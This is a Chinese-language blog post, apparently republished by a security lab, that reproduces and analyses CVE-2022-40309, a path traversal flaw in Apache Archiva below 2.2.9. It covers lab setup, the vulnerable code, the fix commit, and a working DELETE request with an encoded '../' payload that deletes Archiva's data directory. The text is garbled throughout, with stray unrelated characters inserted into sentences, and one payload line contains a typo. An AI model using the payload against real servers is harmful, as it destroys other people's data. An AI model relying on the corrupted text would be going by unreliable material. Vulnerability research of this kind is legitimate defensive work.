聲明
出品|先知社區(qū)(ID:l3yx)
以下內(nèi)容筐乳,來自先知社區(qū)的l3yx作者原創(chuàng)歌殃,由于傳播,利用此文所提供的信息而造成的任何直接或間接的后果和損失蝙云,均由使用者本人負(fù)責(zé)氓皱,長白山攻防實(shí)驗(yàn)室以及文章作者不承擔(dān)任何責(zé)任。
CVE-2022-40309
Apache Archiva是一個(gè)存儲(chǔ)庫管理軟件勃刨,2.2.9以下版本在刪除或者下載Artifact時(shí)波材,可以在目錄或者文件名中注入目錄穿越符,導(dǎo)致任意目錄刪除/任意文件讀取漏洞身隐。
影響范圍
Apache Archiva < 2.2.9
環(huán)境搭建
https://archive.apache.org/dist/archiva/2.2.8/binaries/apache-archiva-2.2.8-bin.zip
https://codeload.github.com/apache/archiva/zip/refs/tags/archiva-2.2.8
./bin/archiva console或.\bin\archiva.bat console
可以提前在conf/wrapper.conf添加如下配置廷区,方便IDEA遠(yuǎn)程調(diào)試
wrapper.java.additional.9=-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005
首次運(yùn)行需要添加Admin用戶,注意需要勾選Validated復(fù)選框:
http://127.0.0.1:8080/#open-admin-create-box
漏洞復(fù)現(xiàn)
前置條件是需要用戶擁有archiva-delete-artifact操作權(quán)限贾铝,使用首次添加的系統(tǒng)管理員賬號或者角色為Repository Manager - internal的賬號都可隙轻,其次需要存儲(chǔ)庫中有Artifact
先上傳一個(gè)Artifact到Archiva Managed Internal Repository
可以抓到如下DELETE請求
DELETE /restServices/archivaServices/repositoriesService/project/internal/com.test/test
在projectid后面添加POC%2f..%2f..%2f..%2-f..%2f..%2fdata,這將刪除Archiva根目錄下的data目錄
DELETE /restServices/archivaServices/repositoriesService/project/internal/com.test/test%2f..%2f..%2f..%2f..%2f..%2fdata
漏洞分析
入口在 org.apache.archiva.rest.api.services.RepositoriesService#deleteProject
@Path ("project/{repositoryId}/{groupId}/{projectId}")@DELETE@Produces ({ MediaType.APPLICATION_JSON, MediaType.APPLICATION_XML, MediaType.TEXT_PLAIN })@RedbackAuthorization (noPermission = true)Boolean deleteProject( @PathParam ("groupId") String groupId, @PathParam ("projectId") String projectId,? ? ? ? ? ? ? ? ? ? ? @PathParam ("repositoryId") String repositoryId )? ? throws ArchivaRestServiceException;? ? org.apache.archiva.rest.services.DefaultRepositoriesService#deleteProject
public Boolean deleteProject( String groupId, String projectId, String repositoryId )? ? throws ArchivaRestServiceException{...? ? if ( !isAuthorizedToDeleteArtifacts( repositoryId ) )? ? {? ? ? ? throw new ArchivaRestServiceException( "not authorized to delete artifacts", 403, null );????}...? ? try? ? {????????ManagedRepositoryContent?repository?=?repositoryFactory.getManagedRepositoryContent(?repositoryId?);? ? ? ? repository.deleteProject( groupId, projectId );? ? }...}
isAuthorizedToDeleteArtifacts?限制登錄用戶需要有archiva-delete-artifact權(quán)限
在repository.deleteProject( groupId, projectId )中直接拼接了目錄名進(jìn)行刪除
org.apache.archiva.repository.content.maven2.ManagedDefaultRepositoryContent#deleteProject
漏洞修復(fù)
https://github.com/apache/archiva/commit/930460424c715f52a7cb5eef5b084a7a8ef31fb5#diff
bde5305e671d2bdf9f05df227a6fa706f87b911c28799575537f806a063a9134R95
歡迎關(guān)注長白山攻防實(shí)驗(yàn)室微信公眾號
定期更新優(yōu)質(zhì)文章分享